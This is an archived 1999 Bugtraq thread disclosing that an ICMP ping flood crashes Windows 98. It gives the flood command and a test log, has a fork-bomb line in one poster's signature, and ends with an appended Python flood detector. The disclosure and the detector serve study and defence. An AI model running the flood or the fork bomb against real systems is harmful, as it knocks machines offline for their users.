Packet Storm, PACKETSTORM:12291
History: Aug 17, 1999 - 12:00 a.m.

windows98.pingflood.txt

`Date: Wed, 17 Feb 1999 03:17:26 -0300  
From: Fabio Bastiglia Oliva <[email protected]>  
To: [email protected]  
Subject: Pingflood attack against Windows98  
  
rewt wrote:  
>  
> Try pinging the windows box with large amounts of icmp...I left 5  
> screened pings, each set to 65000 size...Windows will freeze shortly  
> after it's loaded. You might also try to ping with -f.  
>  
  
Hey...  
I did what you suggested, and it's true... But in my case the  
results were a little worse than yours...  
Windows 98 *REBOOTED* after a ping -f 65000... and there was no need  
to make several screen boxes... With only one ping -f 65000 the system  
rebooted.  
  
Best Regards  
-------------------------------  
Fabio Bastiglia Oliva - Director  
[email protected]  
  
Safe Networks Informatica LTDA.  
http://www.safenetworks.com  
  
----------------------------------------------------------------------  
  
Date: Thu, 18 Feb 1999 13:32:00 -0500  
From: Mark A. Heilpern <[email protected]>  
To: [email protected]  
Subject: Re: Pingflood attack against Windows98  
  
At 03:17 AM 2/17/99 -0300, you wrote:  
>rewt wrote:  
>>  
>> Try pinging the windows box with large amounts of icmp...I left 5  
>> screened pings, each set to 65000 size...Windows will freeze shortly  
>> after it's loaded. You might also try to ping with -f.  
>>  
>  
>Hey...  
> I did what you suggested, and it's true... But in my case the  
>results were a little worse than yours...  
> Windows 98 *REBOOTED* after a ping -f 65000... and there was no need  
>to make several screen boxes... With only one ping -f 65000 the system  
>rebooted.  
  
I issued "ping -f -s 65000 my-win98-address" and after a single return, win98  
locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might  
have had more returns than timing allowed to be displayed before I locked  
up.  
  
----------------------------------------------------------------------  
  
Date: Thu, 18 Feb 1999 21:44:24 -0300  
From: Fabio Bastiglia Oliva <[email protected]>  
To: [email protected]  
Subject: Re: Pingflood attack against Windows98  
  
Hello all,  
  
As I said before, forgive me, because my English is not so good!  
I'll make a "Multi-reply" in this email... It's easier ;)  
Thanks for all the replies!  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
James <[email protected]> wrote:  
>  
> This on a LAN or Internet or both?  
>  
> I made this test in my LAN.  
  
-LAN Speed: 10Mbits.  
-NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.  
-Hubs: 3Com Super Stack II.  
-Windows98 Versions: 4.10.1998 (Portuguese and English versions)  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
Laurent LEVIER <[email protected]> wrote:  
>  
> I tried with the French version of Windows 98.  
>  
> when I run ping -l 65000 -f IPaddr.  
>  
> ping refuses. Of course ping -f 65000 is not accepted too.  
>  
> Strange the ping command changes between US & FR version.  
>  
  
Sorry, I made a mistake when I sent the email to Bugtraq. The  
correct command line (from Linux Slackware 3.6 Kernel 2.0.36) is:  
  
ping -f -s 65000 IPaddr  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
Quantum <[email protected]> wrote:  
>  
> I just tried it & had no success at my Win98 dos prompt,  
>  
  
Try from Linux... I got these results flooding from a  
Linux Slackware 3.6 Kernel 2.0.36...  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
Tom Van Riper <[email protected]>  
>  
> yeah no kidding, the world has known a dialup connection whether it be  
> windows or a unix type operating system, that a small amount of icmp  
> packets will kill the connection for years, that's old stuff.  
> try synflooding on ports 0-65535 for some real fun ;)  
  
Hehe... But a synflood just made the LAN communication slower,  
and didn't affect Windows 98 the way the pingflood did!  
  
Tom Van Riper  
Dreamscape Online  
  
------------------------------------------------------------------------  
  
Best Regards  
-------------------------------  
Fabio Bastiglia Oliva - Diretor  
[email protected]  
  
Safe Networks Informatica LTDA.  
http://www.safenetworks.com  
  
----------------------------------------------------------------------  
  
Date: Fri, 19 Feb 1999 01:16:44 -0300  
From: Fabio Bastiglia Oliva <[email protected]>  
To: [email protected]  
Subject: Pingflood attack against Windows98 - The Test  
  
Hello all,  
  
This is what is happening when I ping flood a Windows98 from a  
Linux Slackware 3.6 (Kernel 2.0.36).  
  
  
-Before the attack-  
  
linux:~# ping 192.168.1.4  
PING 192.168.1.4 (192.168.1.4): 56 data bytes  
64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms  
64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms  
  
--- 192.168.1.4 ping statistics ---  
2 packets transmitted, 2 packets received, 0% packet loss  
round-trip min/avg/max = 0.5/0.5/0.5 ms  
  
  
-The Attack-  
  
linux:~# ping -f -s 65000 192.168.1.4  
PING 192.168.1.3 (192.168.1.4): 65000 data bytes  
.......................................................................  
...................................................../*After lots of  
little dots... Windows98 Rebooted*/...<CTRL+C>  
  
--- 192.168.1.4 ping statistics ---  
11440 packets transmitted, 228 packets received, 98% packet loss  
round-trip min/avg/max = 0.6/32.0/64.2 ms  
  
  
-After the attack-  
  
linux:~# ping 192.168.1.4  
PING 192.168.1.4 (192.168.1.4): 56 data bytes  
  
--- 192.168.1.4 ping statistics ---  
4 packets transmitted, 0 packets received, 100% packet loss  
  
---  
  
That's what's happening here... Have any of you got the same  
results?  
  
Best Regards  
--------------------------------  
Fabio Bastiglia Oliva - Director  
[email protected]  
  
Safe Networks Informatica LTDA.  
http://www.safenetworks.com  
  
----------------------------------------------------------------------  
  
Date: Thu, 11 Feb 1999 03:43:10 +0100  
From: Michal Zalewski <[email protected]>  
To: [email protected]  
Subject: Re: Pingflood attack against Windows98  
  
Sorry, but I'm afraid this thread is a little bit out-of-date. Pingflood  
against Windows 95/98 is a well-known shool DoS. ping -s -f or ping -s -l  
over local networks seems to cause Windows to lock-on permanently (or  
temporarily, depending on weather), or even reboot. Is there anything more  
to talk about?:>  
  
_______________________________________________________________________  
Michal Zalewski [[email protected]] [ENSI / marchew] [dione.ids.pl SYSADM]  
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:  
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]  
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]  
  
----------------------------------------------------------------------  
  
Date: Mon, 22 Feb 1999 04:04:44 -0300  
From: Fabio Bastiglia Oliva <[email protected]>  
To: [email protected]  
Subject: Re: Pingflood attack against Windows98  
  
Michal Zalewski wrote:  
>  
> Sorry, but I'm afraid this thread is a little bit out-of-date.  
> Pingflood against Windows 95/98 is a well-known shool DoS. ping -s -f  
> or ping -s -l over local networks seems to cause Windows to lock-on  
> permanently (or temporarily, depending on weather), or even reboot.  
> Is there anything more to talk about?:>  
>  
  
Dear Mr. Zalewski,  
  
Since Microsoft's announced that Windows 95 DoSs were corrected  
in Windows 98, and we found this bug AGAIN... I think that this thread  
IS NOT out-of-date.  
  
Best Regards  
--------------------------------  
Fabio Bastiglia Oliva - Director  
[email protected]  
  
Safe Networks Informatica LTDA.  
http://www.safenetworks.com  
  
`
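
The flood the thread describes (ICMP echo requests carrying 65000-byte payloads, sent back to back with `ping -f`) stands out on the wire by packet size and by rate. The detector below is an added example, not part of the original thread; the record format, the source addresses and the thresholds are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

ECHO_REQUEST = 8         # ICMP type of an echo request
MAX_UNFRAGMENTED = 1472  # 1500-byte Ethernet MTU - 20 (IP header) - 8 (ICMP header)


def detect_icmp_floods(records, window=1.0, max_rate=50, max_bytes=100_000):
    """Flag (src, dst) pairs whose echo requests exceed the thresholds.

    records: iterable of (timestamp_s, src, dst, icmp_type, payload_len),
    sorted by time. Thresholds are illustrative assumptions, not tuned values.
    Returns {(src, dst): set of reasons}.
    """
    recent = defaultdict(deque)  # (src, dst) -> (ts, payload_len) inside the window
    volume = defaultdict(int)    # (src, dst) -> payload bytes inside the window
    alerts = defaultdict(set)
    for ts, src, dst, icmp_type, size in records:
        if icmp_type != ECHO_REQUEST:
            continue             # replies and other ICMP types are not counted
        key = (src, dst)
        queue = recent[key]
        queue.append((ts, size))
        volume[key] += size
        while queue and ts - queue[0][0] > window:
            volume[key] -= queue.popleft()[1]   # expire old packets
        if len(queue) > max_rate:
            alerts[key].add("rate")             # flood-style packet rate
        if volume[key] > max_bytes:
            alerts[key].add("volume")           # sustained byte volume
        if size > MAX_UNFRAGMENTED:
            alerts[key].add("oversized")        # payload that must be fragmented
    return dict(alerts)


def sample_records():
    """Constructed traffic: one ordinary ping and one 65000-byte flood."""
    normal = [(float(i), "192.168.1.2", "192.168.1.4", 8, 56) for i in range(3)]
    flood = [(10.0 + i * 0.005, "192.168.1.9", "192.168.1.4", 8, 65000)
             for i in range(100)]
    replies = [(10.001 + i * 0.005, "192.168.1.4", "192.168.1.9", 0, 65000)
               for i in range(5)]
    return sorted(normal + flood + replies)


if __name__ == "__main__":
    for pair, reasons in detect_icmp_floods(sample_records()).items():
        print(pair, sorted(reasons))
```
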